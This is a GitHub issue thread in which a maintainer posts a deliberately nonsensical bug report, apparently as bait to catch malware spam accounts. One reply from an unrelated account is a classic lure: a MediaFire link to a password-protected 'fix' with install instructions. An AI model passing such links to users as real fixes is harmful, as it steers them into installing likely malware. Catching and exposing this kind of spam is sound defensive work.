### ISSUE TITLE
A suspicious bug

### ISSUE THREAD

**Issue by ProbablePrime** [Yellow-Dog-Man/Resonite-Issues#2822]
### Describe the bug?

Oh no it break when I do xyz help!

### To Reproduce

1. Be me trying to get work done
2. Be some random github account
3. Do you respond to this with an obvious attempt at malware?

### Expected behavior

I'm trying to avoid the word T E S T.

### Screenshots

![cheese](https://github.com/user-attachments/assets/33f8b0bc-0979-4062-834c-09314484d23f)

### Resonite Version Number

2023.10.7.623

### What Platforms does this occur on?

Windows, Linux, Android / Quest

### What headset if any do you use?

Cheese

### Log Files

sfsfsdffsfsf

### Additional Context

asdf

**Comment by Electronus** [comment]
Have you tried not breaking it?

**Comment by ProbablePrime** [comment]
Must be coming in waves or im hitting some other check, I'll just wait till the next real user issue.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
